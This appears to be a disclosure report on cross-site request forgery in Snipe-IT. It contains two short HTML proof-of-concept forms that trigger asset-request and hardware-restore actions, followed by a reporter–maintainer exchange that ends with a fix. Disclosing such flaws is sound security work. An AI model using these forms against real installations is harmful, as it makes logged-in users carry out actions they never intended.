Cross-Site Request Forgery (CSRF) in snipe/snipe-it
Reported on
Oct 4th 2021
Description
I found some low/medium level CSRFs on nice snipe-it application
Proof of Concepts
change the state of Requestable Assets :
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://develop.snipeitapp.com/account/request-asset/{id}">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
restore a hardware :
// PoC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://develop.snipeitapp.com/hardware/{id}/restore">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
This really wouldn't apply here, since we have fine-grained permissions that wouldn't allow a logged in user to perform an action they weren't authorized to do anyway.
The CSRF attack no need any permission
in this kind attack this is enough to a logged-in user with fine-grained permissions go to attacker website or click a link.
Believe me I report near 200 CSRF vulnerabilities to many of repositories If you want more explanation just tell me my dear.
Please do not call me "dear". The logged in user would still have to have permission to execute the action that the form is requesting. It still has to talk to the server, and the server determines who has permission to do what.
Additionally, Laravel framework requires a CSRF token in order to process form requests, so I'm not sure how you'd even get anything other than a 500 error.
I'm so sorry about 'dear', I'm not a pro in English.
First I want to sure that you already knows about CSRFs attacks ( excuse me about saying this )
a good reference :
https://portswigger.net/web-security/csrf
well, If a user that already have permission to execute the action Or even the admin or super user, go to attacker website or click on a crafted link then the action send to server as the user or admin or super user because the request sent to server with the user who had a permission.
Thanks for validation, If you want to know more about my report just tell me and I will create a Video PoC.
if it is possibly tell me what can I call you in next times ?
Best regards.
No problem re: "dear" - but women in the US don't like to be called "dear" by strangers. It comes off as condescending.
I know what CSRFs are. This just doesn't seem very high risk, since the worst you can do is restore an asset that was deleted. In context, this isn't really that big of a risk.
We'll patch it anyway, but there's limited harm you could do.
Calling me by my name/handle would suffice, thanks for asking.
I should have a PR up shortly.
I have a PR up as a fix for this, but it will be on demo.snipeitapp.com (the master branch), not develop, which is considered unstable and not fit for production currently. The fix on master is still going through QA but should be out shortly.
This is now fixed on demo.snipeitapp.com. It will not appear on develop until the two branches are merged, which will not be for another few weeks, as develop is not stable and not meant for use in production under any circumstances.
